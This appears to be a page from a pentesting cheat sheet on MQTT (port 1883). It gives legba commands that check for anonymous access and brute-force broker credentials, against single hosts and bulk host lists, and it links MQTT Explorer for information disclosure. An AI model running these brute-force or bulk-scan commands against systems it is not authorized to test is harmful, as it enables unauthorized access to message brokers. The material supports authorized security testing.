1833 - MQTT

Potential Risks

Unauthenticated Access

# https://github.com/evilsocket/legba
# RHOST=remoteHost; RPORT=1883
legba mqtt --target $RHOST:$RPORT \
    --username anonymous \
    --password loremIpsumDolorSitAmet

# Bulk testing
# RHOST_LIST=hosts.txt
legba mqtt --target @$RHOST_LIST \
    --username anonymous \
    --password loremIpsumDolorSitAmet \
    --output-format jsonl --output mqtt_unauth.json

Brute Force

# https://github.com/evilsocket/legba
# RHOST=remoteHost; RPORT=1883
# USER_LIST=usernames.txt; PASS_FILE=passwords.txt
legba mqtt --target $RHOST:$RPORT \
    --username $USER_LIST \
    --password $PASS_LIST \
    --output-format jsonl --output mqtt_brute.json

# Bulk testing
# RHOST_LIST=hosts.txt
legba mqtt --target @$RHOST_LIST \
    --username $USER_LIST \
    --password $PASS_LIST \
    --output-format jsonl --output mqtt_brute.json

Exploiting

Information Disclosure

MQTT Explorer. <https://github.com/thomasnordquist/MQTT-Explorer>

Previous1433 - MSSQL Next2375 - Docker

Last updated 3 months ago